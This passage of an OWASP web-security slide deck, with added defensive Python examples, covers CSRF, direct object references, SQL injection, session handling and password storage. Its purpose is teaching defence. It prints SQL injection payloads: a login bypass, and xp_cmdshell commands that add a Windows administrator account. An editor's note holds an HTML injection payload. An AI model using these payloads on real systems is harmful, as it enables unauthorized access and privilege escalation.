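    mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token) -> bool:
    """True only if the token was issued for exactly this session."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    msg = f"{session_id}:{nonce}".encode()
    expected = hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def handle_transfer(request: dict) -> str:
    """Simulated /transfer handler; request = {method, session_id, form}."""
    if request["method"] != "POST":
        return "405 method not allowed"         # the GET from an <img> tag stops here
    form = request.get("form", {})
    if not csrf_token_valid(request["session_id"], form.get("csrf_token")):
        return "403 forbidden"                  # forged POST without our token stops here
    return f"200 transferred {form['amount']} to {form['to_account']}"
```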
  • 19. OWASP Insecure Direct Object Reference
    “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.”
    Fancy term for parameter tampering
      Involves modifying parameters to access unauthorized materials
      E.g. /BankAccount.jsp?acct_nmbr=123
        The hacker modifies the parameter to view another user’s account
  • 21. OWASP Solution
    Properly validate data!
      Cookie data, URL parameters, all HTML form data (even hidden, select, radio and checkbox types)
      Restricting length of HTML text boxes, options in select boxes, and JavaScript validation can all be easily sidestepped and are not secure
      All input data MUST be validated server side for each request – client side validation is EASILY bypassed
    Do not expose internals to the user
      Such as IDs (if possible/necessary)
      Use an indirect reference map with hard to guess keys (hash)
        POST /BankAccount.jsp?acct_nmbr=d83OJdm3
        The server then uses the key to get the real value
          Key: d83OJdm3, value: 123
  • 22. OWASP Use Proper Authorization
    Architect your application to check authorization with every request
    Back to the bank example
      Before: select * from accounts where account_number = ?
      After: select * from accounts where account_number = ? and user_id = ?
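The indirect reference map from the Solution slide together with the "After" query from this slide, as one added example (not code from the slides or from WebGoat): random per-session keys stand in for account numbers, and the lookup itself carries the user_id check. The in-memory SQLite table and its two rows are constructed sample data.

```python
# Added example (not from the OWASP slides): indirect reference map plus an
# account query that also checks ownership (... AND user_id = ?).
import secrets
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (account_number INTEGER PRIMARY KEY,"
             " user_id INTEGER, balance INTEGER)")
conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                 [(123, 1, 500), (124, 2, 9000)])    # constructed sample rows


class ReferenceMap:
    """Per-session map from hard-to-guess keys to real account numbers."""

    def __init__(self):
        self._to_real = {}    # indirect key -> real account number
        self._to_key = {}     # real account number -> indirect key

    def key_for(self, account_number: int) -> str:
        """Return the opaque key for an account, minting one on first use."""
        if account_number not in self._to_key:
            key = secrets.token_urlsafe(8)   # random, like the slide's d83OJdm3
            self._to_key[account_number] = key
            self._to_real[key] = account_number
        return self._to_key[account_number]

    def resolve(self, key: str):
        """Real account number for a key we issued, else None."""
        return self._to_real.get(key)


def get_account(user_id: int, refmap: ReferenceMap, key: str):
    """Resolve the indirect key, then let the query enforce authorization.

    The raw account number never comes from the client, and even a valid
    key only works for the user who owns the account.
    """
    account_number = refmap.resolve(key)
    if account_number is None:
        return None
    return conn.execute(
        "SELECT account_number, balance FROM accounts"
        " WHERE account_number = ? AND user_id = ?",
        (account_number, user_id)).fetchone()
```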
  • 24. OWASP UCLA Security Incident
    30,000 people affected directly; 800,000 notifications sent out 12/2006
    Unsupported/forgotten legacy web application was targeted with escalated database privileges
    Web application vulnerability exposed data online using SQL injection
    Hacked server was then used to gain access to more sensitive servers
  • 25. OWASP SQL Injection Attacks
    “SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements.” (Wikipedia)
  • 26. OWASP Impact of SQL Injection - Dangerous
    At best: you can leak information
    Depending on your configuration, a hacker can
      Delete, alter or create data
      Grant direct access to the hacker
      Escalate privileges and even take over the OS
  • 27. OWASP SQL Injection Attacks
    Login Example Attack
    (On the original slide, text in blue is your SQL code, text in orange is the hacker input, and black text is your application code)
    Login: Password:
    Dynamically build SQL string performing authentication:
      "SELECT * FROM users WHERE login = '" + userName + "' and password = '" + password + "'";
    Hacker logs in as: ' or '' = ''; --
      SELECT * FROM users WHERE login = '' or '' = ''; --' and password = ''
  • 28. OWASP More Dangerous SQL Injection Attacks
    Hacker creates a Windows account:
      SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net users username password /add';--' and password = ''
    And then adds himself as an administrator:
      SELECT * FROM users WHERE login = ''; exec master..xp_cmdshell 'net localgroup Administrators username /add';--' and password = ''
    SQL Injection examples are outlined in:
      http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
      http://www.unixwiz.net/techtips/sql-injection.html
  • 29. OWASP Exploits of a Mom http://xkcd.com/327/
  • 31. OWASP Preventing SQL injection
    Use Prepared Statements (aka Parameterized Queries)
      $id=1234
      "select * from accounts where id = " + $id vs "select * from accounts where id = 1234"
    Validate input
      Strong typing
        If the id parameter is a number, try parsing it into an integer
      Business logic validation
      Escape questionable characters (ticks, --, semi-colon, brackets, etc.)
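The login query from the Login Example slide built by string concatenation, beside the same query as a prepared statement, plus the strong-typing check for an id parameter, as an added example (not code from the slides or from WebGoat). The in-memory SQLite table and its one user are constructed; the injected login uses the slide's `' or '' = ''` followed by the `--` comment, without the semicolon, because the Python sqlite3 driver executes a single statement at a time.

```python
# Added example (not from the OWASP slides): concatenated SQL versus a
# parameterized query, and integer parsing of an id parameter.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")  # constructed row


def login_concat(user_name: str, password: str) -> bool:
    """Vulnerable: user input becomes part of the SQL text, so a quote in the
    login field ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM users WHERE login = '" + user_name
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_prepared(user_name: str, password: str) -> bool:
    """Hardened: the statement text is fixed; the values travel separately as
    parameters and cannot change the statement's structure."""
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (user_name, password)).fetchone() is not None


def parse_account_id(raw: str) -> int:
    """Strong typing: an id must be a decimal integer, so anything else is
    rejected before it gets near a query."""
    if not raw.isdecimal():
        raise ValueError("id must be a non-negative integer")
    return int(raw)


if __name__ == "__main__":
    injected = "' or '' = '' --"        # the slide's input, minus the semicolon
    print(login_concat(injected, "anything"))    # True: logged in without a password
    print(login_prepared(injected, "anything"))  # False: no such login exists
```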
  • 32. OWASP Minimize the Impact of SQL injection
    Quiz: Is running a Web Application as the Database System Admin “sa” account a good practice?
    Use the principle of least privilege
      If the query is reading the database, do not run the query as a user with update permissions (dbo, drop, etc)
  • 33. OWASP Injection Impacts More Than SQL
    “Injection Flaw” is a blanket term
    SQL Injection is most prevalent
    Other forms:
      XPath Injection
      Command Injection
      LDAP (Lightweight Directory Access Protocol) Injection
      DOM (Document Object Model) Injection
      JSON (JavaScript Object Notation) Injection
      Log Spoofing
      On and on and on…
  • 35. OWASP Authentication Checks
    From http://www.owasp.org/index.php/Top_10_2010-Main:
      “Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”
    Never store passwords in plaintext
      Encrypt or Hash+Salt (preferred)
    Architect applications to check every request to see that the authentication data is still valid
    Issue a new session token when a change in privilege occurs
      ASP reuses session IDs by default!
    If you absolutely must use “remember me” functionality, use a difficult to guess authentication cookie
    Authentication data is sent with every request, so protect it
  • 36. OWASP Session Attacks
    Session Fixation: The hacker predicts a valid session key (usually via phishing)
    Session Hijacking: The hacker masquerades as another user by stealing the user’s session id (usually via XSS)
  • 38. OWASP Hardening Authentication
    Every request to each page of a web application should be revalidated for proper authenticated and authorized access
    Check the validity of the authentication cookie on each request. Validate that the original IP address is the same as the current request IP, and check the age since it was created or last checked. Deny access if not.
    Check that the authenticated user is authorized to access your application (using an internal database of users, LDAP, an authorization service, etc) on each request
  • 39. OWASP Solution
    Use built-in session management!
      Most application servers do a pretty good job of this (except ASP, boo Microsoft)
    Use secure randomly generated session keys to make prediction impossible
    Don’t expose the user to session ids if possible
    Use reasonable session timeouts
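What the Authentication Checks, Hardening Authentication and Solution slides ask of a session layer, as one added example (not code from the slides or from any application server): ids from a CSPRNG, revalidation on every request including the IP and age checks, an idle timeout, and a fresh id whenever privilege changes. The store layout, the 15-minute timeout and the injectable clock are assumptions for illustration.

```python
# Added example (not from the OWASP slides): a minimal server-side session
# store implementing the checks the slides list.
import secrets
import time

IDLE_TIMEOUT_SECONDS = 15 * 60      # assumed timeout value


class SessionStore:
    def __init__(self, clock=time.time):
        self._sessions = {}         # session id -> {user, role, ip, last_seen}
        self._clock = clock         # injectable for tests

    def create(self, ip: str) -> str:
        """Anonymous session; the id comes from the OS CSPRNG, not a counter."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "role": "anonymous",
                               "ip": ip, "last_seen": self._clock()}
        return sid

    def validate(self, sid: str, ip: str):
        """Per-request check: known id, same IP as when issued, not idle too
        long. Returns the session dict, or None (and drops expired ones)."""
        s = self._sessions.get(sid)
        if s is None or s["ip"] != ip:
            return None
        if self._clock() - s["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]
            return None
        s["last_seen"] = self._clock()
        return s

    def elevate(self, sid: str, ip: str, user: str, role: str):
        """Privilege change (login, admin step-up): issue a new id and retire
        the old one, so an id that existed before login carries no privilege."""
        s = self.validate(sid, ip)
        if s is None:
            return None
        del self._sessions[sid]
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {**s, "user": user, "role": role}
        return new_sid
```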
  • 41. OWASP Failure to Restrict URL Access
    “Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.”
    Can be caused by:
      Improper authentication
      Incorrect authorization
      Unprotected admin areas
        Usually caused by easy to guess URLs
    .htaccess is your friend!
  • 43. OWASP Insecure Cryptographic Storage
    From http://www.owasp.org/index.php/Top_10_2007: “Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.”
    Use latest standard encryption methods
      They are standards for a reason! And they change over time
    Use strong standard encryption methods
      Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm (SHA1), Data Encryption Standard (DES)
      Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)
    Encrypt stored passwords with above methods
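The "Hash+Salt (preferred)" advice from the Authentication Checks slide with the SHA-256 recommendation from this one, as an added example (not code from the slides): each password gets its own random salt and is hashed with SHA-256 through PBKDF2 (hashlib.pbkdf2_hmac, a standard iterated construction chosen here, not named on the slides), beside the unsalted MD5 the slides say to stop using. The record format and iteration count are assumptions.

```python
# Added example (not from the OWASP slides): salted SHA-256 password storage
# via PBKDF2, with the legacy unsalted MD5 shown for contrast.
import hashlib
import hmac
import secrets

ITERATIONS = 100_000   # assumed work factor; raise it as hardware gets faster


def hash_password(password: str) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$digest'.

    A fresh 16-byte random salt per user means two users with the same
    password get different records, and one precomputed table cannot be
    reused across accounts.
    """
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False               # refuse legacy or unknown record formats
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def legacy_md5(password: str) -> str:
    """What the slides say to stop doing: unsalted MD5. Same input gives the
    same output for every user, so one lookup table breaks all of them."""
    return hashlib.md5(password.encode()).hexdigest()
```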
  • 44. OWASP “MD5 Considered Harmful Today”
    MD5 has been known to have serious weaknesses which produce collisions
      It has been considered a weak hash function since at least 2004
    Using knowledge of MD5 collisions, researchers were able to impersonate a root CA common to all browsers
      This rogue CA can issue SSL certificates that even the knowledgeable end user may not notice
    http://www.win.tue.nl/hashclash/rogue-ca/

Editor's Notes

  • #47: WIFI Example "/><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/oHg5SJYRHA0&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><font color="black">@gmail.com